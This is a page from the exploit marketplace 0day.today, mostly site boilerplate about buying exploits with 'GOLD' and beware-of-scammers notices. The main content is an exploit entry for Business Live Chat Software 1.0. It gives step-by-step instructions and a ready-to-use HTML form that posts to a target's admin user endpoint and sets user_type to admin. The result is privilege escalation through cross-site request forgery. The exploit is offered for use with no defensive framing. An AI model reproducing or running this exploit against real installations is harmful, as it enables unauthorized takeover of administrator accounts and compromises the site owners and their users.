0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin) Exploit
# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin) # Description: Operator Can Change Role User Type to admin # Exploit Author: Meisam Monsef # Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php # Version: V-1.0 # Tested on: ubuntu Exploit : 1 - please login or create account 2 - open exploit.html in browser 3 - change you user id input for Change Role User Type to admin 4 - fill input data (fname - lname - email) 5 - click Update Button 6 - logout account 7 - login again you are admin & Enjoying <form action="https://TARGET/admin/user/users/create" enctype="multipart/form-data" method="post" accept-charset="utf-8"> user_id : <input type="text" name="user_id" value="1"> <!-- change your user_id --> <br> fname : <input type="text" name="fname" value="" /> <!-- fill your first name --> <br> lname : <input type="text" name="lname" value="" /> <!-- fill your last name --> <br> email : <input type="text" name="email" value="" /> <!-- fill your email --> <br> user_type : <input type="text" name="user_type" value="1" /> <br> status : <input type="text" name="status" value="1" /> <br> <button type="submit">Update</button> </form> # 0day.today [2024-12-24] #